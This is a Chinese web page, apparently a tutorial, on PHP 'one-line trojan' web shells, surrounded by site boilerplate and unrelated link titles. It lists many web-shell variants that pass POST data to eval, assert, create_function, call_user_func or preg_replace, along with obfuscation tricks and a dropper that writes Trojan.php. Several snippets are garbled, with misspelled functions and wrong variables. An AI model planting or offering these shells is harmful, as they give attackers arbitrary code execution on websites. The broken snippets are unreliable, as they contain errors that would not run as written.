客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。 例如:<?php @eval($_POST['a']);?> 其中 eval 就是执行命令的函数,$_POST['a'] 就是接收的数据。 eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。
使用 其他函数制作一句话木马assert函数<?php assert[@$_POST['a']);?> creat_funcction函数<?php $fun = creat_function('',$_POST['a']); $fun(); ?> 把用户传递的数据生成一个函数fun(),然后再执行fun() call_user_func回调函数<?php @call_user_func(assert,$_POST['a']); ?> call_user_func这个函数可以调用其他函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数。 preg_replace函数<?php @preg_replace("/abcde/e",$_POST['a'],"abcdefg"); ?>
file_put_contents函数<?php $test='<?php $a=$a_POST["cmd"];assert($a);?>'; file_put_contents("Trojan.php",$test); ?> 函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件内容。 str_replace函数<?php $a=str_replace("Walao","","eWaldoval"); $a=(@$_POST['a']); ?>
base64_decode函数<?php $a=base64_decode("ZXZhbA==") $a($_POST['a']); ?> parse_str函数<?php $str="a=eval"; parse_str($str); $a($a_POST['a']); ?> PHP变量函数①<?php $a = "eval"; $a(@$_POST['a']); ?> 第三行使用了变量函数$a,变量存储了函数名eval,便可以直接使用变量替代函数名。 ②<?php $bb="eval"; $a="bb"; $$aa($_POST['a']); ?>
<?php $a="e"."v"; $b="a"."l"; $c=$a.$b; $c=($_POST['a']); ?> <?php function fun() {return $_POST['a'];} @preg_replace("/test/e",fun(),"test test test"); ?>
|
2022-08-17
2022-11-06
2022-08-17
2022-08-14
2022-07-18
MikeMcQuaid/strap:
headcr4sh/node-maven: Maven for Node.js
Realtek Linux/Android Bluetooth Mesh SDK has a buffer overflow vulnerability due
traex/RippleEffect: Implementation of Ripple effect from Material Design for And
Multiple vulnerabilities in the web-based management interface of Cisco Small Bu
csimmonds/procrank_linux: procrank from Android ported to (embedded) Linux
readmeio/markdown: ReadMe's flavored Markdown parser and React-based renderi
【成语名字】不欺暗室 【成语拼音】b qī n sh 【成语释义】欺:欺骗自己;暗室:人家
Oxtay/modulationclassification_matlab: MATLAB files of modulation classification
Adobe InCopy versions 17.2 (and earlier) and 16.4.1 (and earlier) are affected b
请发表评论